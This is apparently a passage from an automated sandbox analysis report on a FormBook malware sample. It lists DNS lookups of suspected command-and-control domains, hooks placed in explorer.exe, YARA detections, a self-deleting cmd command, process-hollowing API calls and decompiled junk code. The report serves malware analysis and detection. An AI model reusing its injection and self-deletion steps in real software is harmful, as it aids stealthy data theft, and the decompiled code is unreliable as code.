                      Oct 27, 2021 19:35:24.922605038 CEST | 53 | 64021 | 8.8.8.8 | 192.168.2.6
                      Oct 27, 2021 19:35:47.099709988 CEST | 50700 | 53 | 192.168.2.6 | 8.8.8.8
                      Oct 27, 2021 19:35:47.126094103 CEST | 53 | 50700 | 8.8.8.8 | 192.168.2.6

                      DNS Queries

                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                      Oct 27, 2021 19:34:47.814812899 CEST | 192.168.2.6 | 8.8.8.8 | 0xef69 | Standard query (0) | www.usauber.com | A (IP address) | IN (0x0001)
                      Oct 27, 2021 19:35:04.025022030 CEST | 192.168.2.6 | 8.8.8.8 | 0xdedd | Standard query (0) | www.sunnytheodora.com | A (IP address) | IN (0x0001)
                      Oct 27, 2021 19:35:24.880810976 CEST | 192.168.2.6 | 8.8.8.8 | 0xc2a6 | Standard query (0) | www.vrchance.com | A (IP address) | IN (0x0001)
                      Oct 27, 2021 19:35:47.099709988 CEST | 192.168.2.6 | 8.8.8.8 | 0x4c2 | Standard query (0) | www.marciaroyal.com | A (IP address) | IN (0x0001)

                      DNS Answers

                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                      Oct 27, 2021 19:34:47.836822033 CEST | 8.8.8.8 | 192.168.2.6 | 0xef69 | Name error (3) | www.usauber.com | none | none | A (IP address) | IN (0x0001)
                      Oct 27, 2021 19:35:04.055140972 CEST | 8.8.8.8 | 192.168.2.6 | 0xdedd | Name error (3) | www.sunnytheodora.com | none | none | A (IP address) | IN (0x0001)
                      Oct 27, 2021 19:35:47.126094103 CEST | 8.8.8.8 | 192.168.2.6 | 0x4c2 | No error (0) | www.marciaroyal.com | cname.landingi.com | | CNAME (Canonical name) | IN (0x0001)
                      Oct 27, 2021 19:35:47.126094103 CEST | 8.8.8.8 | 192.168.2.6 | 0x4c2 | No error (0) | cname.landingi.com | | 54.77.19.84 | A (IP address) | IN (0x0001)
                      Oct 27, 2021 19:35:47.126094103 CEST | 8.8.8.8 | 192.168.2.6 | 0x4c2 | No error (0) | cname.landingi.com | | 52.212.68.12 | A (IP address) | IN (0x0001)
                      Oct 27, 2021 19:35:47.126094103 CEST | 8.8.8.8 | 192.168.2.6 | 0x4c2 | No error (0) | cname.landingi.com | | 108.128.238.226 | A (IP address) | IN (0x0001)

                      Code Manipulations

                      User Modules

                      Hook Summary

                      Function Name | Hook Type | Active in Processes
                      PeekMessageA | INLINE | explorer.exe
                      PeekMessageW | INLINE | explorer.exe
                      GetMessageW | INLINE | explorer.exe
                      GetMessageA | INLINE | explorer.exe

                      Processes

                      Process: explorer.exe, Module: user32.dll
                      Function Name | Hook Type | New Data
                      PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE0
                      PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE0
                      GetMessageW | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xE0
                      GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xE0

                      System Behavior

                      General

                      Start time:19:33:36
                      Start date:27/10/2021
                      Path:C:\Users\user\Desktop\VJaX7U6LAp.exe
                      Wow64 process (32bit):true
                      Commandline:'C:\Users\user\Desktop\VJaX7U6LAp.exe'
                      Imagebase:0x140000
                      File size:520192 bytes
                      MD5 hash:15A4B8C6607B8E67B0BBA2D1B5DBD43E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.362891212.0000000003659000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.362891212.0000000003659000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.362891212.0000000003659000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.362570337.0000000002651000.00000004.00000001.sdmp, Author: Joe Security
                      Reputation:low

                      General

                      Start time:19:33:38
                      Start date:27/10/2021
                      Path:C:\Users\user\Desktop\VJaX7U6LAp.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Users\user\Desktop\VJaX7U6LAp.exe
                      Imagebase:0x220000
                      File size:520192 bytes
                      MD5 hash:15A4B8C6607B8E67B0BBA2D1B5DBD43E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low

                      General

                      Start time:19:33:39
                      Start date:27/10/2021
                      Path:C:\Users\user\Desktop\VJaX7U6LAp.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\Desktop\VJaX7U6LAp.exe
                      Imagebase:0xb40000
                      File size:520192 bytes
                      MD5 hash:15A4B8C6607B8E67B0BBA2D1B5DBD43E
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.359814087.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.359438927.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.428718419.00000000018A0000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.428718419.00000000018A0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.428718419.00000000018A0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.428663450.0000000001870000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.428663450.0000000001870000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.428663450.0000000001870000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.424469063.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:low

                      General

                      Start time:19:33:42
                      Start date:27/10/2021
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff6f22f0000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.392844589.000000000763B000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.392844589.000000000763B000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.392844589.000000000763B000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.407150774.000000000763B000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.407150774.000000000763B000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.407150774.000000000763B000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:high

                      General

                      Start time:19:34:06
                      Start date:27/10/2021
                      Path:C:\Windows\SysWOW64\help.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\help.exe
                      Imagebase:0xac0000
                      File size:10240 bytes
                      MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.620322575.0000000000990000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.620322575.0000000000990000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.620322575.0000000000990000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.620433344.00000000009C0000.00000004.00000001.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.620433344.00000000009C0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.620433344.00000000009C0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Author: Joe Security
                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.619605094.0000000000480000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                      Reputation:moderate

                      General

                      Start time:19:34:12
                      Start date:27/10/2021
                      Path:C:\Windows\SysWOW64\cmd.exe
                      Wow64 process (32bit):true
                      Commandline:/c del 'C:\Users\user\Desktop\VJaX7U6LAp.exe'
                      Imagebase:0x2a0000
                      File size:232960 bytes
                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      General

                      Start time:19:34:14
                      Start date:27/10/2021
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff61de10000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Disassembly

                      Code Analysis

                        Executed Functions

                        APIs
                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05778CBE
                        Memory Dump Source
                        • Source File: 00000000.00000002.366582403.0000000005770000.00000040.00000001.sdmp, Offset: 05770000, based on PE: false
                        Similarity
                        • API ID: CreateProcess
                        • String ID:
                        • API String ID: 963392458-0
                        • Opcode ID: dcb063d8c29c102ca5991e7baa7509fe557668022cd79ac6c83a0ff634fca28f
                        • Instruction ID: 2fbe72f6c7cf3457c36c34595992904345501df4de7ac0fc4b783d0563226285
                        • Opcode Fuzzy Hash: dcb063d8c29c102ca5991e7baa7509fe557668022cd79ac6c83a0ff634fca28f
                        • Instruction Fuzzy Hash: 41915971D0022DDFDF10CFA4D884BEDBBB6BB48314F0585A9E809A7290DB749985DF92
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00B69AF6
                        Memory Dump Source
                        • Source File: 00000000.00000002.362049233.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: c23ddaf80416bfce9ea23dc08d4259ad0d7f2cb5202ce1234902709d5980354d
                        • Instruction ID: 0d09848d0ec5ac29726c3c1bf2904931ac19d606438d8525e5e22c607f1caf25
                        • Opcode Fuzzy Hash: c23ddaf80416bfce9ea23dc08d4259ad0d7f2cb5202ce1234902709d5980354d
                        • Instruction Fuzzy Hash: 88713470A00B058FDB24DF6AD08179AB7F5FF88714F008A6DD49AD7A40DB39E849CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 00B654A9
                        Memory Dump Source
                        • Source File: 00000000.00000002.362049233.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 353520da38de3a3b6c788d454bd0d340f74285c1e0fbe23b3843f90aad3433b3
                        • Instruction ID: ab65fd52daa67031b7b1ce55a85a15ad45f98bca5074dbba9703b9616f5b5cdc
                        • Opcode Fuzzy Hash: 353520da38de3a3b6c788d454bd0d340f74285c1e0fbe23b3843f90aad3433b3
                        • Instruction Fuzzy Hash: D441F2B1C00618CFDB24DFA9C8847DEBBB5FF48304F20856AD409AB250DB75694ACF91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • CreateActCtxA.KERNEL32(?), ref: 00B654A9
                        Memory Dump Source
                        • Source File: 00000000.00000002.362049233.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                        Similarity
                        • API ID: Create
                        • String ID:
                        • API String ID: 2289755597-0
                        • Opcode ID: 781c2ca1f99aee49bc56076e9da04c121eeaaaa0c2be01ce42bfa3f021409c20
                        • Instruction ID: 0ec6a632575ee1d3760d0d3a92d1f85f3b444d96fc8faaff46173810b271cf4f
                        • Opcode Fuzzy Hash: 781c2ca1f99aee49bc56076e9da04c121eeaaaa0c2be01ce42bfa3f021409c20
                        • Instruction Fuzzy Hash: 0C41CF71C00618CBDB24DFA9C888BDEBBF9FF48304F248569D409AB251DB75694ACF91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05778890
                        Memory Dump Source
                        • Source File: 00000000.00000002.366582403.0000000005770000.00000040.00000001.sdmp, Offset: 05770000, based on PE: false
                        Similarity
                        • API ID: MemoryProcessWrite
                        • String ID:
                        • API String ID: 3559483778-0
                        • Opcode ID: 3749a20a4683936db467e5c6d37bf8b517a768e4f3ed8ee8b51b403b028664c5
                        • Instruction ID: d1e17a7e8af5d6792ff3a8c7ebefa2b8a0caf2fd407a7fbcd9ab3ae0771a515f
                        • Opcode Fuzzy Hash: 3749a20a4683936db467e5c6d37bf8b517a768e4f3ed8ee8b51b403b028664c5
                        • Instruction Fuzzy Hash: 0E2124719003499FCF10DFA9C884BEEBBF5FF48314F14882AE919A7240D778A954DBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B6BD9E,?,?,?,?,?), ref: 00B6BE5F
                        Memory Dump Source
                        • Source File: 00000000.00000002.362049233.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: 6082976b11e86e7507b68d6be19f6290c595b72fe2c99b3c4f3812cbe5915133
                        • Instruction ID: 25457de28df9832cea7ec205ad16676694e7d4b1c244dccd564ed494af5710a7
                        • Opcode Fuzzy Hash: 6082976b11e86e7507b68d6be19f6290c595b72fe2c99b3c4f3812cbe5915133
                        • Instruction Fuzzy Hash: 6B21E6B5D00248AFDB10CF99D484ADEBBF8FB48324F14846AE914A7310D379A954CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B6BD9E,?,?,?,?,?), ref: 00B6BE5F
                        Memory Dump Source
                        • Source File: 00000000.00000002.362049233.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                        Similarity
                        • API ID: DuplicateHandle
                        • String ID:
                        • API String ID: 3793708945-0
                        • Opcode ID: ec7bc4c285e03045d3a9b961ca122b821d7d0592e9f6eb33fd3113da860caf16
                        • Instruction ID: 48ee67d0aa704f2dc1193d1d3c39a3d85313f2d96eb8146c96234fd11a61acca
                        • Opcode Fuzzy Hash: ec7bc4c285e03045d3a9b961ca122b821d7d0592e9f6eb33fd3113da860caf16
                        • Instruction Fuzzy Hash: 1321F5B5D00208AFDB10CFA9D484ADEBFF8FB48320F14841AE918A7310D379A955CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • GetThreadContext.KERNELBASE(?,00000000), ref: 057786E6
                        Memory Dump Source
                        • Source File: 00000000.00000002.366582403.0000000005770000.00000040.00000001.sdmp, Offset: 05770000, based on PE: false
                        Similarity
                        • API ID: ContextThread
                        • String ID:
                        • API String ID: 1591575202-0
                        • Opcode ID: b45d8f4529e32747774bf4637cd8b259ce6252d8f26c345a4a66f1fe95d5b98e
                        • Instruction ID: 3465e251d65c460f174eb84d3a6d96e78d66517de26e47c755b475ee70f334e7
                        • Opcode Fuzzy Hash: b45d8f4529e32747774bf4637cd8b259ce6252d8f26c345a4a66f1fe95d5b98e
                        • Instruction Fuzzy Hash: CD213871D003099FCB10DFAAC484BEEBBF4FF48224F14842AD419A7241DB78A944CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05778970
                        Memory Dump Source
                        • Source File: 00000000.00000002.366582403.0000000005770000.00000040.00000001.sdmp, Offset: 05770000, based on PE: false
                        Similarity
                        • API ID: MemoryProcessRead
                        • String ID:
                        • API String ID: 1726664587-0
                        • Opcode ID: fb54bead485bff9a07da993c4f8c0d0c7677292c24d483c06209f72e755a6042
                        • Instruction ID: b4a85632dc08b4bbcc617362c38a839b6a91cba0d1a74ac79da61c5a6855c075
                        • Opcode Fuzzy Hash: fb54bead485bff9a07da993c4f8c0d0c7677292c24d483c06209f72e755a6042
                        • Instruction Fuzzy Hash: 6E2116B18002499FCF10DFA9C884AEEBBF5FF48354F548829E519A7240D7749954DBA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B69B71,00000800,00000000,00000000), ref: 00B69D82
                        Memory Dump Source
                        • Source File: 00000000.00000002.362049233.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: c9890d11c5c1340908bb46283665148ccf082fb3dd20727131efb7c44c991a3c
                        • Instruction ID: d78068932684cb082d18eba1f9198df52c2bde05ca227b1b541b53c1da5982d6
                        • Opcode Fuzzy Hash: c9890d11c5c1340908bb46283665148ccf082fb3dd20727131efb7c44c991a3c
                        • Instruction Fuzzy Hash: 7E1126B2D003499FDB10CF9AC444ADEFBF8EB88324F14846EE519A7200C379A945CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 057787AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.366582403.0000000005770000.00000040.00000001.sdmp, Offset: 05770000, based on PE: false
                        Similarity
                        • API ID: AllocVirtual
                        • String ID:
                        • API String ID: 4275171209-0
                        • Opcode ID: 0380f7928e28c3cbd76bdb8855a870260121decd6099b118435805f5defdaa05
                        • Instruction ID: 27c35d57a8ecf2e75c1cc0ea463723f62e8d432ddecf9456369edd205d21f0a4
                        • Opcode Fuzzy Hash: 0380f7928e28c3cbd76bdb8855a870260121decd6099b118435805f5defdaa05
                        • Instruction Fuzzy Hash: 711156718002499FCF10DFA9C844BEFBBF9EB48324F148829E519A7250C775A954CFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00B69B71,00000800,00000000,00000000), ref: 00B69D82
                        Memory Dump Source
                        • Source File: 00000000.00000002.362049233.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                        Similarity
                        • API ID: LibraryLoad
                        • String ID:
                        • API String ID: 1029625771-0
                        • Opcode ID: 76a9284b757b85a0faaf6c51e96caecdb1248a42a9be77878b4606e4c0e895dd
                        • Instruction ID: 6cd73356ea70bfd3b2d0597f34db2dae03d97232a306383167c0aaed27ce0f40
                        • Opcode Fuzzy Hash: 76a9284b757b85a0faaf6c51e96caecdb1248a42a9be77878b4606e4c0e895dd
                        • Instruction Fuzzy Hash: 5C1104B6D002498FCB10CF9AD444ADEFBF8EB88324F14846ED419A7600C379A945CFA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,0577BEB9,?,?), ref: 0577C060
                        Memory Dump Source
                        • Source File: 00000000.00000002.366582403.0000000005770000.00000040.00000001.sdmp, Offset: 05770000, based on PE: false
                        Similarity
                        • API ID: ChangeCloseFindNotification
                        • String ID:
                        • API String ID: 2591292051-0
                        • Opcode ID: c1a3f2d77d3df42bff3ddc52dbfc27986d190b61b0a186816498c4d0d97f0dbb
                        • Instruction ID: d6185447504550697e672514f09f194b74bcb2fd5b94ccdcd3cdad7621e77eea
                        • Opcode Fuzzy Hash: c1a3f2d77d3df42bff3ddc52dbfc27986d190b61b0a186816498c4d0d97f0dbb
                        • Instruction Fuzzy Hash: 091136B18007098FDB20DF99D444BEEBBF8FB48324F148429D959A7340D378A948CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.366582403.0000000005770000.00000040.00000001.sdmp, Offset: 05770000, based on PE: false
                        Similarity
                        • API ID: ResumeThread
                        • String ID:
                        • API String ID: 947044025-0
                        • Opcode ID: a339cb515f37ed6cdb46419de7638b6577ca00906902a32aa6c3b5dca1d72d75
                        • Instruction ID: 4ef1953c9f0eedd32c6c7479862e76bc9f547c21088f090dd793756b6c06dad8
                        • Opcode Fuzzy Hash: a339cb515f37ed6cdb46419de7638b6577ca00906902a32aa6c3b5dca1d72d75
                        • Instruction Fuzzy Hash: E81136B1D003498FCB10DFAAD4447EFFBF9EB88224F248829D519A7240D775A944CFA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • GetModuleHandleW.KERNELBASE(00000000), ref: 00B69AF6
                        Memory Dump Source
                        • Source File: 00000000.00000002.362049233.0000000000B60000.00000040.00000001.sdmp, Offset: 00B60000, based on PE: false
                        Similarity
                        • API ID: HandleModule
                        • String ID:
                        • API String ID: 4139908857-0
                        • Opcode ID: 375331c99ec7d9e5e20cd501bb7524a96eb25b8f2c7c78f44fb65ce08b0c9b4d
                        • Instruction ID: 8dea78de573b185be402ebc4e302b532fdd4c1263e883a7f52669e8ecc419176
                        • Opcode Fuzzy Hash: 375331c99ec7d9e5e20cd501bb7524a96eb25b8f2c7c78f44fb65ce08b0c9b4d
                        • Instruction Fuzzy Hash: CD11E3B5C006498FDB10CF9AD484BDEFBF8EB88324F14845AD419B7600D379A545CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        • PostMessageW.USER32(?,?,?,?), ref: 0577AF95
                        Memory Dump Source
                        • Source File: 00000000.00000002.366582403.0000000005770000.00000040.00000001.sdmp, Offset: 05770000, based on PE: false
                        Similarity
                        • API ID: MessagePost
                        • String ID:
                        • API String ID: 410705778-0
                        • Opcode ID: be283a39d687a5434323cfa3745318db6cb2116044221b2d474cbdce6f146b18
                        • Instruction ID: 90c1aff767dfcd0d17c87ae90895a6383f7fcf909607288e52d2c4ea90902130
                        • Opcode Fuzzy Hash: be283a39d687a5434323cfa3745318db6cb2116044221b2d474cbdce6f146b18
                        • Instruction Fuzzy Hash: CD11E5B58003499FDB10CF99D484BDEBBF8FB48324F148419E519A7600D375A954CFA1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        C-Code - Quality: 82%
                        			E00145375(signed int __eax, signed int __ebx, signed int __ecx, intOrPtr* __edx, intOrPtr* __edi, void* __esi) {
                        				intOrPtr* _t70;
                        				signed char _t71;
                        				signed char _t72;
                        				signed char _t73;
                        				signed char _t74;
                        				signed char _t75;
                        				signed char _t76;
                        				signed char _t77;
                        				signed char* _t80;
                        				signed int _t81;
                        				signed int _t82;
                        				intOrPtr* _t83;
                        				intOrPtr* _t86;
                        				intOrPtr* _t87;
                        				intOrPtr* _t88;
                        				intOrPtr* _t89;
                        				signed char _t91;
                        				intOrPtr* _t92;
                        				intOrPtr* _t96;
                        				void* _t97;
                        				intOrPtr* _t101;
                        				void* _t103;
                        				intOrPtr* _t107;
                        				signed char _t109;
                        				void* _t110;
                        				intOrPtr* _t116;
                        				intOrPtr* _t119;
                        				intOrPtr* _t120;
                        				void* _t121;
                        				void* _t123;
                        				void* _t126;
                        
                        				_t116 = __edi;
                        				_t107 = __edx;
                        				_t91 = __ebx | __ecx;
                        				 *(__edi + 0x64003002) =  *(__edi + 0x64003002) | __ecx;
                        				asm("das");
                        				 *__eax =  *__eax + __eax;
                        				 *__eax =  *__eax + __eax;
                        				 *__eax = __ecx;
                        				asm("adc byte [esp+ecx*2], 0x3");
                        				 *__eax =  *__eax ^ __eax;
                        				asm("pushfd");
                        				asm("das");
                        				 *__eax =  *__eax + __eax;
                        				 *__eax =  *__eax + __eax;
                        				_t96 =  *__eax;
                        				asm("adc al, 0x4c");
                        				_t119 = __esi +  *_t96;
                        				_t70 = __eax + __edx;
                        				asm("das");
                        				 *_t70 =  *_t70 + _t70;
                        				 *_t70 =  *_t70 + _t70;
                        				_t71 =  *_t70;
                        				 *_t71 = _t70;
                        				if( *_t70 != 0) {
                        					_push(es);
                        					 *__edx =  *__edx + __edx;
                        					 *_t119 =  *_t119 + _t96;
                        					 *_t71 =  *_t71 ^ _t71;
                        					 *_t71 =  *_t71 + _t71;
                        					 *((intOrPtr*)(_t119 + 0x6101218)) =  *((intOrPtr*)(_t119 + 0x6101218)) + _t71;
                        					 *__edx =  *__edx + __edx;
                        					 *_t71 =  *_t71 + _t91;
                        					 *_t71 =  *_t71 ^ _t71;
                        				}
                        				 *_t71 =  *_t71 + _t71;
                        				 *((intOrPtr*)(_t96 - 0x28f638f8)) =  *((intOrPtr*)(_t96 - 0x28f638f8)) + _t71;
                        				 *_t107 =  *_t107 + _t119;
                        				 *((intOrPtr*)(_t71 + _t119)) =  *((intOrPtr*)(_t71 + _t119)) + _t91;
                        				 *_t71 =  *_t71 + _t71;
                        				 *_t71 =  *_t71 + _t71;
                        				 *_t71 =  *_t71 | 0x01d713b7;
                        				_t72 = _t71 ^  *_t71;
                        				asm("pushad");
                        				 *_t72 =  *_t72 ^ _t72;
                        				 *_t72 =  *_t72 + _t72;
                        				 *((intOrPtr*)(_t119 + 0x6101218)) =  *((intOrPtr*)(_t119 + 0x6101218)) + _t72;
                        				 *_t107 =  *_t107 + _t107;
                        				 *_t72 =  *_t72 + _t107;
                        				 *_t72 =  *_t72 ^ _t72;
                        				 *_t72 =  *_t72 + _t72;
                        				 *((intOrPtr*)(_t96 + 0x100e0100)) =  *((intOrPtr*)(_t96 + 0x100e0100)) + _t72;
                        				_push(es);
                        				_t73 = _t72 ^  *_t72;
                        				 *_t96 = _t107;
                        				 *_t73 =  *_t73 + _t73;
                        				 *_t73 =  *_t73 + _t73;
                        				 *_t73 =  *_t73 + 0x6160d07;
                        				_t74 = _t73 ^  *_t73;
                        				asm("pushfd");
                        				 *_t74 =  *_t74 ^ _t74;
                        				 *_t74 =  *_t74 + _t74;
                        				 *((intOrPtr*)(_t96 - 0x4eeb5300)) =  *((intOrPtr*)(_t96 - 0x4eeb5300)) + _t74;
                        				_t120 = _t119 +  *_t91;
                        				 *_t116 =  *_t116 + _t96;
                        				_t75 = _t74 ^  *_t74;
                        				 *_t75 =  *_t75 + _t75;
                        				 *((intOrPtr*)(_t96 + 0x220a7800)) =  *((intOrPtr*)(_t96 + 0x220a7800)) + _t75;
                        				 *_t75 =  *_t75 + _t75;
                        				 *((intOrPtr*)(_t96 + 0x220a6800)) =  *((intOrPtr*)(_t96 + 0x220a6800)) + _t75;
                        				_t109 = _t107 +  *0x321e00 +  *_t116;
                        				 *_t75 =  *_t75 + _t91;
